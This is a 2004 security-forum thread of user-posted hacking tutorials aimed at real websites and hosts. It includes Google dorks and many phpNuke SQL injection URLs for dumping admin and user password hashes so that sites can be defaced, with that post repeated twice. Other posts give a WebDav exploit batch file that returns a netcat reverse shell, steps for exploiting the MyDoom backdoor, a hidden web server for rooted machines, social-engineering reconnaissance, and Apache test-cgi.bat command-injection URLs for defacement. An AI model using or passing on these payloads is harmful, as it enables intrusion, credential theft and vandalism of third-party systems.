Government Security
Network Security Resources

Jump to content

Tutorials.

security hacking tutorial
  • Please log in to reply
67 replies to this topic

#16 whiskah

whiskah

    Staff Sergeant

  • Sergeant Major
  • 397 posts

Posted 04 March 2004 - 07:24 PM

Defacing phpNUke sites Using Multiple SQL INJECTION TECHNIQUES
Although this is very old, I was surprised to see thousands of sites
vulnerable even security sites and some hacking sites using phpNUke..

TOOLS:
1. Google,Browser
2. MD5 password cracker
Cain and Abel
Lepton's Crack
Rainbowcrack
mdcrack
3. Wordlist


STEPS:

1. Google search strings:this are just examples(this is just how I did), use your imagination..
allinurl:/modules.php?name=Downloads
allinurl:/modules.php?name=Web_links
allinurl:/modules.php?name=Sections
allinurl:/modules.php?name=Reviews
2. goto site then copy paste the strings that starts with '&' so the query for
downloads module sample would be hxxp://phpnukesite/modules.php?name=Downloads&d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--

weblinks module sample would be hxxp://phpnukesite/modules.php?name=Web_links&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*

Sections module sample would be
hxxp://phpnukesite/modules.php?name=Sections&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors

Reviews module sample would be
hxxp://phpnukesite/modules.php?name=Reviews&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*

3. If you cracked the admin hash then login thru http://phpnukesite/admin.php
4. Respect and don't damage too much, Just inform them to patch
6. You will be amazed how many sites you can deface
7. Some alternative queries are listed below:

[DOWNLOADS MODULE]
--admin,hash---
&d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--

--names,logins,passes
&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors

---all pseudos of users,pass---6.9
&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*

---6.9logins, ID, encrypted passwords, names, emails and levels of all reg users---
&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,user_email,user_level,0,0%20FROM%20nuke_users
---------------------------------------------------------------
allinurl:/modules.php?name=Web_Links
[WEBLINKS MODULE]
--user,hash----
&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*

--hash--
&l_op=viewlink&cid=2 UNION Select aid,pwd,1 from nuke_authors --

----admin username-------
&l_op=viewlink&cid=2 UNION Select 1,aid,pwd from nuke_authors --

--hash---
&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors

----Resteer towards the password----
&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

-----------------------------------------------------------------
allinurl:/modules.php?name=Sections

[SECTIONS MODULE]
--admin hash---
&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors
---user,hash---
&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors

-----------------------------------------------------------------
allinurl:/modules.php?name=Reviews
[REVIEWS MODULE]

&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*Defacing phpNUke sites Using Multiple SQL INJECTION TECHNIQUES
Although this is very old, I was surprised to see thousands of sites
vulnerable even security sites and some hacking sites using phpNUke..

TOOLS:
1. Google,Browser
2. MD5 password cracker
Cain and Abel
Lepton's Crack
Rainbowcrack
mdcrack
3. Wordlist


STEPS:

1. Google search strings:this are just examples(this is just how I did), use your imagination..
allinurl:/modules.php?name=Downloads
allinurl:/modules.php?name=Web_links
allinurl:/modules.php?name=Sections
allinurl:/modules.php?name=Reviews
2. goto site then copy paste the strings that starts with '&' so the query for
downloads module sample would be http://phpnukesite/m...wdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--
weblinks module sample would be http://phpnukesite/m...0nuke_authors/*
Sections module sample would be http://phpnukesite/m..... nuke_authors
Reviews module sample would be http://phpnukesite/m...0nuke_authors/*
3. If you cracked the admin hash then login thru http://phpnukesite/admin.php
4. Respect and don't damage too much, Just inform them to patch
6. You will be amazed how many sites you can deface
7. Some alternatice queries are listed below:

[DOWNLOADS MODULE]
--admin,hash---
&d_op=viewdownload&cid=2 UNION select counter,aid,pwd from nuke_authors--

--names,logins,passes
&l_op=viewlinkeditorial&lid=-1%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors

---all pseudos of users,pass---6.9
&d_op=viewdownload&cid=-1%20UNION%20SELECT%20user_id,username,user_password%20FROM%20nuke_users/*

---6.9logins, ID, encrypted passwords, names, emails and levels of all reg users---
&d_op=modifydownloadrequest&lid=-1%20UNION%20SELECT%200,username,user_id,user_password,name,user_email,user_level,0,0%20FROM%20nuke_users
---------------------------------------------------------------
allinurl:/modules.php?name=Web_Links
[WEBLINKS MODULE]
--user,hash----
&l_op=viewlinkcomments&lid=-1%20UNION%20SELECT%20aid,1,pwd,1%20FROM%20nuke_authors/*

--hash--
&l_op=viewlink&cid=2 UNION Select aid,pwd,1 from nuke_authors --

----admin username-------
&l_op=viewlink&cid=2 UNION Select 1,aid,pwd from nuke_authors --

--hash---
&l_op=viewlink&cid=1%20UNION%20SELECT%20pwd,0%20FROM%20nuke_authors%20LIMIT%201,2
&l_op=brokenlink&lid=0%20UNION%20SELECT%201,aid,name,pwd%20FROM%20nuke_authors

----Resteer towards the password----
&l_op=visit&lid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors

-----------------------------------------------------------------
allinurl:/modules.php?name=Sections

[SECTIONS MODULE]
--admin hash---
&op=listarticles&secid=-1%20UNION%20SELECT%20pwd%20FROM%20nuke_authors
&op=listarticles&secid=-1%20UNION%20SELECT%200,0,pwd,0,0%20FROM%20nuke_authors%20WHERE%201/*
&op=printpage&artid=-1%20UNION%20SELECT%20aid,pwd%20FROM%20nuke_authors
---user,hash---
&op=viewarticle&artid=-1%20UNION%20SELECT%200,0,aid,pwd,0%20FROM%20nuke_authors

-----------------------------------------------------------------
allinurl:/modules.php?name=Reviews
[REVIEWS MODULE]

&rop=showcontent&id=-1%20UNION%20SELECT%200,0,aid,pwd,email,email,100,pwd,url,url,10000,name%20FROM%20nuke_authors/*

#17 Guest_Jay_*

Guest_Jay_*
  • Guests

Posted 04 March 2004 - 11:18 PM

Thanks for that.

4. Respect and don't damage too much, Just inform them to patch
6. You will be amazed how many sites you can deface



I hope everyone lets the admin know and not defaces the web site <_<

#18 Guest_rockerx_*

Guest_rockerx_*
  • Guests

Posted 05 March 2004 - 01:59 PM

Hi, i wrote this today. The english translation is just for this board

E n g l i s h

What do we want?
-We wan't to set up a very simple webserver on the rooted server.

What do we need?
- hiderun.exe
- miniwebserver.exe (u better rename it)
- miniwebserver.ini
- some html files (optional)

Ok, first we create the ini file
open your favourite editor and type the following text and save it as miniwebserver.ini

Port=13373
Root=C:\
Listing=1

"Port" is selfexplaining
"Root" is the directory where the server looks for he htmlfiles (needs to exist)
"LIsting": shows directory listing if html files are missing. options 0 (disabled) 1 (enabled)

ok, now upload the files to the server into one and the same directory and execute the server using:
hiderun miniwebserver.exe cfg=miniwebserver.ini

Now it's done! The server is up!

note: after a reboot the webserver will not start up automatically
but you know how to solve this problem :)

rockerx


D e u t s c h

Was beschreibt diese txt?
- Wie wir einen kleinen simplen webserver auf nem gehaxten server aufsetzen

Was brauchen wir dafür?
- hiderun.exe
- miniwebserver.exe (besser umbenennen)
- miniwebserver.ini
- html dateien (optional)

Ok, zuerst schreiben wir die ini datei
tippe in deinem editor folgende zeilen ein und speichere sie als miniwebserver.ini ab

Port=13373
Root=C:\
Listing=1

"Port" erklärt sich von selbst
"Root" ist das verzeichnis wo der server die html dateien erwartet
"Listing": Zeigt den verzeichnisinhalt an wenn keine index.html vorhanden ist options 0 (disabled) 1 (enabled)

Gut, jetzt lade die dateien auf den server in ein verzeichnis hoch und starte den webserver wie folgt
hiderun miniwebserver.exe cfg=miniwebserver.ini

ok, jetzt läuft der server.

nach nem reboot wird der webserver nicht automatisch mit gestartet aber wie ihr das bewerkstelligen könnt wisst ihr ja

rockerx

#19 Guest_rotem_*

Guest_rotem_*
  • Guests

Posted 19 March 2004 - 06:09 AM

cab someone explain me something about the MyDoom ?
please tell me what tools i need
and how do i send the packet to the host ?

#20 JohnAcres

JohnAcres

    Private First Class

  • Members
  • 21 posts

Posted 20 March 2004 - 10:33 AM

Hacking WebDav

I'm going to do this tutorial like a science lab because I like that format. I haven't really read around that much so I'm not sure if this has been posted before or not or if this is even needed.

Purpose: Get a shell on the host.

Tools/Materials: wb.exe (the WebDav exploit by kralor, www.coromputer.net)
nc.exe (netcat)

Procedure:
1. Open up netcat, nc -L -vv -p 1434
2. Make a batfile for wb.exe to get all the paddings in order to make easier.

This will cover all the paddings just replace %1 with the target computer and %2 with the computer that u want the victim to connect to
wb %1 %2 1434 0
wb %1 %2 1434 1
wb %1 %2 1434 2
wb %1 %2 1434 3
wb %1 %2 1434 4
wb %1 %2 1434 5
wb %1 %2 1434 6
wb %1 %2 1434 7
wb %1 %2 1434 8
wb %1 %2 1434 9
wb %1 %2 1434 10
wb %1 %2 1434 11
wb %1 %2 1434 12
wb %1 %2 1434 13
wb %1 %2 1434 14
wb %1 %2 1434 15
wb %1 %2 1434 16
wb %1 %2 1434 17
wb %1 %2 1434 18
wb %1 %2 1434 19
wb %1 %2 1434 20
wb %1 %2 1434 0
wb %1 %2 1434 1
wb %1 %2 1434 2
wb %1 %2 1434 3
wb %1 %2 1434 4
wb %1 %2 1434 5
wb %1 %2 1434 6
wb %1 %2 1434 7
wb %1 %2 1434 8
wb %1 %2 1434 9
wb %1 %2 1434 10
wb %1 %2 1434 11
wb %1 %2 1434 12
wb %1 %2 1434 13
wb %1 %2 1434 14
wb %1 %2 1434 15
wb %1 %2 1434 16
wb %1 %2 1434 17
wb %1 %2 1434 18
wb %1 %2 1434 19
wb %1 %2 1434 20
wb %1 %2 1434 203
wb %1 %2 1434 71
wb %1 %2 1434 190
wb %1 %2 1434 194
wb %1 %2 1434 200
wb %1 %2 1434 -3

3. Run the bat and watch nc for the shell.

Thats about it... not hard, not complicated, or really new but I thought it might help someone out.

#21 Logan

Logan

    Specialist

  • Sergeant Major
  • 1,596 posts

Posted 21 March 2004 - 03:16 PM

people. this is for tutorials... not requesting tutorials...

some of these are nice for new tallent, good job guys
about the one using echo...
you can just use notepad or any wordprocessor to make life way easier... but if you're in dos or constructing a batch file, that's a very usefull command.....


#22 NeBoKaDnEzZaR

NeBoKaDnEzZaR

    Private First Class

  • Members
  • 49 posts

Posted 25 March 2004 - 12:25 AM

Hei Thx a lot for the Web Server Turtorial. :D A really good idea to make it in 2 langauges resoect. I also will make TUT'S here wehn i learned some new. Was a good idea.

Greez NeBo

#23 TwitcH

TwitcH

    Private First Class

  • Members
  • 40 posts

Posted 25 March 2004 - 02:06 AM

This tut is just a lil something im still working on, hope this helps.




Gathering Information On Your Target V1.6 An Unsecure Team Tutorial

http://unsecure.khgamez.com Author: TwitcH Date:25/03/04

-ContentS-
1: Gathering Basic Information on The Administrator
2: Gaining Your Targets IP Address
3: Finding out the Targets Operating System Type and The Services it is Running
4: Port Scanners Will Help You Uncover Those Holes...
4: Finding Exploits for these Services

ChapteR 1: Gathering Basic Information On the Administrator

Gathering information on the person that runs your target system might seem a bit silly but belive me it can help a damn lot when trying to gain access to the system. One example of this is cracking passwords ie: Your trying to use a dictionary attack on his password hash using an english dictionary when in fact he is actually japanese and so is his password, or another reason this can be very useful is that social engineers can get to know his/her habits/hobbies/interests and work there way into the system by tricking people he works with into giving you access. We'll start by visiting the admins website, take note of the topic of the website this can be a very big clue as to what the admin is interested in (and you could also find other less secure sites he might have a username and password on to try and get his password which might also be the password to his e-mail/server). Also try and grab his e-mail address (even his e-mail addy's name could be a big clue as to what his password is). You can even try slapping his e-mail addy into msn and try to talk to him pretending to be someone he knows or someone interested in what his server is running (just try not to sound too suspicious). Once you know as much as you can about the admin try doing a finger or whois on his website/e-mail (these tools are explained in the mini-tutorials sections on the unsecure site) I think thats about all you can do to find out about the admin (just remember exploiting/cracking isnt the only way into a server).

ChapteR 2: Gaining Your Targets IP Address

This is a very important but relatively easy part of gathering information on the target. You will need the targets IP address to use tools such as Port Scanners, Exploits, Sniffers blablabla... Getting it as i said earlier is a piece of piss, one easy way of doing this is nslookup just go to your commandline and type nslookup "inserthostname here" <(Without The Quotes!!) this should hopefully bring up the hosts IP addy. BUT! this might not be the way into the server you might need to hack the admins personal computer so you will need the admins personal computers IP addy, getting this can be a bit harder. I cant think of any definate way of doing this but there are some tools that you can download that will let you get the IP Address using MSN, ICQ and other programs that use a connection between the two computers.

Chapter 3: Port Scanners Will Help You Uncover Those Holes...

There are lots of different port scanners available for you today, some have millions of options others just do a simple TCP scan. This chapter will just tell you a little about the best ones available and where to get them from.

Nmap:
Nmap can be found at http://www.insecure.org and is a linux based port scanner (although there is a windows port i dont reccomend it due to really slow scanning times).
Nmaps best feature is its amount of scanning options, some of these are:
* Vanilla TCP connect() scanning,
* TCP SYN (half open) scanning,
* TCP FIN (stealth) scanning,
* TCP ftp proxy (bounce attack) scanning,
* SYN/FIN scanning using IP fragments (bypasses packet filters),
* UDP recvfrom() scanning,
* UDP raw ICMP port unreachable scanning,
* ICMP scanning (ping-sweep), and
* Reverse-ident scanning.
* OS Detection

as you can see thats quite a list and very very useful in any hackers eyes ;).

GFI LanGuard Network Security Scanner: http://www.gfi.com
This is a windows based scanner with a nice easy to use gui, this scanner will not only detect OS version, scan the ports and do port range scans, it also looks to see if the target has any security holes!! This lil bugger will scan there computer using the latest exploits/trojan ports and tell you if the target computer is exploitable. This can help a damn lot when gathering information on a target. Once the scanner has found an exploit, it will show you a link to the BugTraq listing for this exploit where you can possibly find out how to exploit this hole.

NetScan Tools Pro 2000: http://www.nwpsw.com
This is a simpler version of a windows GUI based port scanner, but this one has a shitload more options, things like finger, ping, traceroute, WhoIs, SMTP E-mail generator, NetBios Info Lookup and about 10 more... Only thing is this one is not free, you have to pay for it. (although i do think i saw this floating around DC++ ;) )


ChapteR 4: Finding Exploits For The Services

This part is simple, everyone no matter how dumb should be able to find an exploit just try and find out the version of the service you want to exploit open up google and search for "blabla 1.0 exploit" or summin along those lines. Find the exploits compile, read the instructions and attack. Ill write up another tutorial on using some common exploits one day. (just vote for the tutorial you want at unsecure.khgamez.com) Well that just about wraps it up for Version 1 of this tutorial (yes i said version one this thing will get updated and will go into the extreme details of everything ive mentioned in here) so while your waiting for more fuller explanations and techniques for gathering information on your target server head over to unsecure.khgamez.com and fill them boards, post some tutorials and submit some news.
Another way of finding new exploits is to sign yourself up to an exploit mailing list, these can be very helpful on difficult hacks because new exploits are appearing

Anyone wanting to be a part of the unsecure.khgamez.com team should send me an e-mail at illuminati_2600@hotmail.com thank you and happy hacking

#24 migo

migo

    Private First Class

  • Members
  • 99 posts

Posted 31 March 2004 - 02:23 PM

wow!

#25 binary_hashes

binary_hashes

    Specialist

  • Members
  • 109 posts

Posted 31 March 2004 - 07:37 PM

hi, all
i m also a new
i want to know the difference between MS03-026 AND MS03-036 Vulneribility
pLeAse i need some guidance

#26 Guest_eXtiGy_*

Guest_eXtiGy_*
  • Guests

Posted 03 April 2004 - 03:15 AM

MD5 password cracker


Hello all, regarding this MD5 cracker, i always stuck at "password size 6 scanning" for a very very long time, like, 2 hrs or more, didnt continue cracking after 2 hours+. what is the problem? anyone knows? or is the hash is impossible to crack at all?

this is the hash by the way.. : 48b63ee26e7e0f115bfc627cd9b6c725 :blink:

#27 Guest_Jay_*

Guest_Jay_*
  • Guests

Posted 03 April 2004 - 03:24 AM

eXtiGy. This looks like you are doing illegal things and then posting the hash in the main forum asking for help.This is a security forum and not a script kiddy forum.

Member suspended. :angry:

#28 Guest_Cyberneo_*

Guest_Cyberneo_*
  • Guests

Posted 15 April 2004 - 07:06 PM

cab someone explain me something about the MyDoom ?
please tell me what tools i need
and how do i send the packet to the host ?

Hello, this is my first post arround here and hopefully there will be a lot more soon. Well my doom its not that big of a deal to get to, all u need to use MyDoom is a port scanner, the rsCRT.exe, a telnet prog like nc.exe and the prog to exploit the vuln itself called mykralor.exe.

1- so, first thing is first, u need to get the range u want to check for the doom vuln scanned, for wich we´ll use the port scanner, and set it to scann on port 3127.

2- After u get a list of results from the scann u open the rsCRT.exe; wich will create us a remote shell that we can uplaod to the place ur testing for security issues. So just set the Ip and port u want this program to Bind the shell to and hit the create button.

3- Now we need to prepare to get a shell. Open nc.exe and set it to listen to any (nc.exe -l -vv -p PORT#) It will wait for an incomming connection from the place u uploaded the program created with rsCRT.exe to give you a shell.

4- Open mykralor.exe and with your results from the scan and run it like this.
ie. mykralor.exe Target_IP 3127 shell.exe
*note* shell.exe should be in the same directory as mykralor.exe
This will start sending the packet to the provided hosts and if the host is infected u´ll get a prompt dropped in ur nc.exe listening window.

To secure any site u find with this vuln u just need to upload a file called securemydoom.com and get in a cmd prompt and type securemydoom.com -NOC
with that, the program will start an autosearch in the site for infected files and will erase em from it and ur box will be cleaned fro this nasty virus.

If u need this cleaner file just lemme know. I can send it anywere or post it here. Hope this helps u and any1 else that needs ingo in MyDoom virus.

#29 Guest_pink.frog_*

Guest_pink.frog_*
  • Guests

Posted 16 April 2004 - 11:09 AM

Thanks for the MyDoom Tut. Great piece of work

#30 TheRealGiant

TheRealGiant

    Private First Class

  • Members
  • 58 posts

Posted 17 April 2004 - 03:20 AM

Not new, but might help someone.

Apache Win32 - 1.3.23 & 2.0.28 Hacking

What you need :
+++++++++++++++

You don't need any tool to make the deface. This vulnerability can be exploited
via a browser.

_____________________________________________________________________________

Lets start...


1.This vulnerability has been exploited on - Apache 1.3.23
- Apache 2.0.28-BETA (By default includes /cgi-bin/test-cgi.bat
file which enables this attack)

When a request for a DOS batch file (.bat or.cmd) is sent to an Apache
web server, the server will spawn a shell interpreter (cmd.exe by
default) and will run the script with the parameters sent to it by the
user. Because no proper validation is done on the input, it is possible
to send a pipe character ('|') with commands appended to it as
parameters to the CGI script, and the shell interpreter will execute
them.


2.Find a webserver running Apache 1.3.23(Win) or Apache 2.0.28-BETA(Win)

(a)To view the httpd.conf file residing in the /conf directory of the
Apache installation, you must copy it into the virtual web root.

To do this, write in your browser:

hxxp://www.target.com/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf


(b)To view the contents of the C:\ drive create in /htdocs a file containing
the directory listing of the drive.

To do this, write in your browser:

hxxp://www.target.com/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt


©To make your deface you will use the echo command.

To do this, write in your browser:

hxxp://www.target.com/cgi-bin/test-cgi.bat?|echo+Defaced bY YOU+>>+..\htdocs\index.html

This will append the string "Defaced bY YOU" to the index.html file residing in
the virtual web root directory.


Thats how this vulnerability can be exploited...





Also tagged with one or more of these keywords: security, hacking, tutorial